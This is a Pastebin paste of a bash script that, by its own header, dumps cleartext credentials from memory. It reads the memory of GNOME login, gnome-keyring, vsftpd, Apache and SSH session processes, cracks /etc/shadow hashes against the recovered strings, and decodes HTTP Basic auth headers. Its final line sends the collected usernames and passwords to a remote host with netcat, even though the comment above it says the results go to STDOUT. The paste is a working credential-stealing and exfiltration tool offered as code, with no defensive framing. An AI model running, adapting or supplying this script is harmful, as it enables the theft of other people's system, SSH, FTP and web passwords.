SHARE
TWEET

Capsh10

a guest Mar 23rd, 2019 82 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2.  
  3. # Author: Hunter Gregal
  4. # Github: /huntergregal Twitter: /huntergregal Site: huntergregal.com
  5. # Dumps & sends cleartext credentials from memory
  6.  
  7. #root check
  8.  
  9.  
  10.  
  11. if [[ "$EUID" -ne 0 ]]; then
  12.     echo "Root required - You are dumping memory..."
  13.     echo "Even mimikatz requires administrator"
  14.     exit 1
  15. fi
  16.  
  17. #Store results to cleanup later
  18. export RESULTS=""
  19.  
  20.  
  21. # $1 = PID, $2 = output_file, $3 = operating system
  22. function dump_pid () {
  23.  
  24.     system=$3
  25.     pid=$1
  26.     output_file=$2
  27.     if [[ $system == "kali" ]]; then
  28.         mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | grep -E 'heap|stack' | cut -d' ' -f 1)
  29.     else
  30.         mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1)
  31.     fi
  32.     while read -r memrange; do
  33.         memrange_start=$(echo "$memrange" | cut -d"-" -f 1)
  34.         memrange_start=$(printf "%u\n" 0x"$memrange_start")
  35.         memrange_stop=$(echo "$memrange" | cut -d"-" -f 2)
  36.         memrange_stop=$(printf "%u\n" 0x"$memrange_stop")
  37.         memrange_size=$((memrange_stop - memrange_start))
  38.         dd if=/proc/"$pid"/mem of="${output_file}"."${pid}" ibs=1 oflag=append conv=notrunc \
  39.             skip="$memrange_start" count="$memrange_size" > /dev/null 2>&1
  40.     done <<< "$mem_maps"
  41. }
  42.  
  43.  
  44.  
  45. # $1 = DUMP, $2 = HASH, $3 = SALT, $4 = SOURCE
  46. function parse_pass () {
  47.  
  48.     #If hash not in dump get shadow hashes
  49.     if [[ ! "$2" ]]; then
  50.             SHADOWHASHES="$(cut -d':' -f 2 /etc/shadow | grep -E '^\$.\$')"
  51.     fi
  52.  
  53.     #Determine password potential for each word
  54.     while read -r line; do
  55.         #If hash in dump, prepare crypt line
  56.         if [[ "$2" ]]; then
  57.             #get ctype
  58.             CTYPE="$(echo "$2" | cut -c-3)"
  59.             #Escape quotes, backslashes, single quotes to pass into crypt
  60.             SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;')
  61.             CRYPT="\"$SAFE\", \"$CTYPE$3\""
  62.             if [[ $(python2 -c "import crypt; print crypt.crypt($CRYPT)") == "$2" ]]; then
  63.                 #Find which user's password it is (useful if used more than once!)
  64.                 USER="$(grep "${2}" /etc/shadow | cut -d':' -f 1)"
  65.                 export RESULTS="$RESULTS$4          $USER:$line \n"
  66.             fi
  67.         #Else use shadow hashes
  68.         elif [[ $SHADOWHASHES ]]; then
  69.             while read -r thishash; do
  70.                 CTYPE="$(echo "$thishash" | cut -c-3)"
  71.                 SHADOWSALT="$(echo "$thishash" | cut -d'$' -f 3)"
  72.                 #Escape quotes, backslashes, single quotes to pass into crypt
  73.                 SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;')
  74.                 CRYPT="\"$SAFE\", \"$CTYPE$SHADOWSALT\""
  75.                 if [[ $(python2 -c "import crypt; print crypt.crypt($CRYPT)") == "$thishash" ]]; then
  76.                     #Find which user's password it is (useful if used more than once!)
  77.                     USER="$(grep "${thishash}" /etc/shadow | cut -d':' -f 1)"
  78.                     export RESULTS="$RESULTS$4          $USER:$line\n"
  79.                 fi
  80.             done <<< "$SHADOWHASHES"
  81.         #if no hash data - revert to checking probability
  82.         else
  83.         patterns=("^_pammodutil.+[0-9]$"\
  84.                  "^LOGNAME="\
  85.                  "UTF-8"\
  86.                  "^splayManager[0-9]$"\
  87.                  "^gkr_system_authtok$"\
  88.                  "[0-9]{1,4}:[0-9]{1,4}:"\
  89.                  "Manager\.Worker"\
  90.                  "/usr/share"\
  91.                  "/bin"\
  92.                  "\.so\.[0-1]$"\
  93.                  "x86_64"\
  94.                  "(aoao)"\
  95.                  "stuv")
  96.         export RESULTS="$RESULTS[HIGH]$4            $line\n"
  97.         for pattern in "${patterns[@]}"; do
  98.           if [[ $line =~ $pattern ]]; then
  99.             export RESULTS="$RESULTS[LOW]$4         $line\n"
  100.           fi
  101.         done
  102.         fi
  103.     done <<< "$1"
  104. } # end parse_pass
  105.  
  106.  
  107. #Support Kali
  108. if [[ $(uname -a | awk '{print tolower($0)}') == *"kali"* ]]; then
  109.     SOURCE="[SYSTEM - GNOME]"
  110.     #get gdm-session-worker [pam/gdm-password] process
  111.     PID="$(ps -eo pid,command | sed -rn '/gdm-password\]/p' | awk -F ' ' '{ print $1 }')"
  112.     #if exists aka someone logged into gnome then extract...
  113.     if [[ $PID ]];then
  114.         while read -r pid; do
  115.             dump_pid "$pid" /tmp/dump "kali"
  116.             HASH="$(strings "/tmp/dump.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
  117.             SALT="$(echo "$HASH" | cut -d'$' -f 3)"
  118.             DUMP="$(strings "/tmp/dump.${pid}" | grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A 5)"
  119.             DUMP="${DUMP}$(strings "/tmp/dump.${pid}" | grep -E '^gkr_system_authtok$' -B 5 -A 5)"
  120.             #Remove dupes to speed up processing
  121.             DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
  122.             parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
  123.    
  124.             #cleanup
  125.             rm -rf "/tmp/dump.${pid}"
  126.         done <<< "$PID"
  127.     fi
  128. fi
  129.  
  130. #Support gnome-keyring
  131. if [[ -n $(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring) ]]; then
  132.  
  133.         SOURCE="[SYSTEM - GNOME]"
  134.         #get /usr/bin/gnome-keyring-daemon process
  135.         PID="$(ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk -F ' ' '{ print $1 }')"
  136.  
  137.     #if exists aka someone logged into gnome then extract...
  138.     if [[ $PID ]];then
  139.         while read -r pid; do
  140.             dump_pid "$pid" /tmp/dump
  141.             HASH="$(strings "/tmp/dump.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
  142.             SALT="$(echo "$HASH" | cut -d'$' -f 3)"
  143.             DUMP=$(strings "/tmp/dump.${pid}" | grep -E '^.+libgck\-1\.so\.0$' -B 10 -A 10)
  144.             DUMP+=$(strings "/tmp/dump.${pid}" | grep -E -A 5 -B 5 'libgcrypt\.so\..+$')
  145.             #Remove dupes to speed up processing
  146.             DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
  147.             parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
  148.             #cleanup
  149.             rm -rf "/tmp/dump.${pid}"
  150.         done <<< "$PID"
  151.     fi
  152. fi
  153.  
  154. #Support VSFTPd - Active Users
  155. if [[ -e "/etc/vsftpd.conf" ]]; then
  156.         SOURCE="[SYSTEM - VSFTPD]"
  157.         #get nobody /usr/sbin/vsftpd /etc/vsftpd.conf
  158.         PID="$(ps -eo pid,user,command | grep vsftpd | grep nobody | awk -F ' ' '{ print $1 }')"
  159.     #if exists aka someone logged into FTP then extract...
  160.     if [[ $PID ]];then
  161.         while read -r pid; do
  162.             dump_pid "$pid" /tmp/vsftpd
  163.             HASH="$(strings "/tmp/vsftpd.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
  164.             SALT="$(echo "$HASH" | cut -d'$' -f 3)"
  165.             DUMP=$(strings "/tmp/vsftpd.${pid}" | grep -E -B 5 -A 5 '^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$')
  166.             #Remove dupes to speed up processing
  167.             DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
  168.             parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
  169.         done <<< "$PID"
  170.  
  171.         #cleanup
  172.         rm -rf /tmp/vsftpd*
  173.     fi
  174. fi
  175.  
  176. #Support Apache2 - HTTP BASIC AUTH
  177. if [[ -e "/etc/apache2/apache2.conf" ]]; then
  178.         SOURCE="[HTTP BASIC - APACHE2]"
  179.         #get all apache workers /usr/sbin/apache2 -k start
  180.         PID="$(ps -eo pid,user,command | grep apache2 | grep -v 'grep' | awk -F ' ' '{ print $1 }')"
  181.     #if exists aka apache2 running
  182.     if [[ "$PID" ]];then
  183.         #Dump all workers
  184.         while read -r pid; do
  185.             gcore -o /tmp/apache "$pid" > /dev/null 2>&1
  186.             #without gcore - VERY SLOW!
  187.             #dump_pid $pid /tmp/apache
  188.         done <<< "$PID"
  189.         #Get encoded creds
  190.         DUMP="$(strings /tmp/apache* | grep -E '^Authorization: Basic.+=$' | cut -d' ' -f 3)"
  191.         #for each extracted b64 - decode the cleartext
  192.         while read -r encoded; do
  193.             CREDS="$(echo "$encoded" | base64 -d)"
  194.             if [[ "$CREDS" ]]; then
  195.                 export RESULTS="$RESULTS$SOURCE         $CREDS\n"
  196.             fi
  197.         done <<< "$DUMP"
  198.         #cleanup
  199.         rm -rf /tmp/apache*
  200.     fi
  201. fi
  202.  
  203. #Support sshd - Search active connections for Sudo passwords
  204. if [[ -e "/etc/ssh/sshd_config" ]]; then
  205.     SOURCE="[SYSTEM - SSH]"
  206.     #get all ssh tty/pts sessions - sshd: user@pts01
  207.     PID="$(ps -eo pid,command | grep -E 'sshd:.+@' | grep -v 'grep' | awk -F ' ' '{ print $1 }')"
  208.     #if exists aka someone logged into SSH then dump
  209.     if [[ "$PID" ]];then
  210.         while read -r pid; do
  211.             dump_pid "$pid" /tmp/sshd
  212.             HASH="$(strings "/tmp/sshd.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
  213.             SALT="$(echo "$HASH" | cut -d'$' -f 3)"
  214.             DUMP=$(strings "/tmp/sshd.${pid}" | grep -E -A 3 '^sudo.+')
  215.             #Remove dupes to speed up processing
  216.             DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
  217.             parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
  218.         done <<< "$PID"
  219.         #cleanup
  220.         rm -rf /tmp/sshd.*
  221.     fi
  222. fi
  223.  
  224. #Output results to STDOUT
  225. printf "%b" "$RESULTS" | sort -u | nc 192.168.1.37 443
  226. unset RESULTS
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top